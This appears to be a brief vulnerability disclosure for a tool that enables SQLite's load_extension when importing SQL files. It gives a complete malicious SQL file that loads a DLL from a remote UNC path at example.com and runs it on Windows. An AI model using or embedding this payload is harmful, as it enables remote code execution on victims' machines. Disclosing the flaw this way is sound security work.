When importing a sql file the load_extension function is enabled. An attacker can craft a malicious sql file like this:

BEGIN TRANSACTION;
CREATE TABLE `test` (
	`id`	INTEGER
);
INSERT INTO `test` VALUES (load_extension("\\example.com\sqlite_extension.dll", "hello"));
COMMIT;

On a Windows machine this sql file will download sqlite_extension.dll from example.com and then execute the function hello.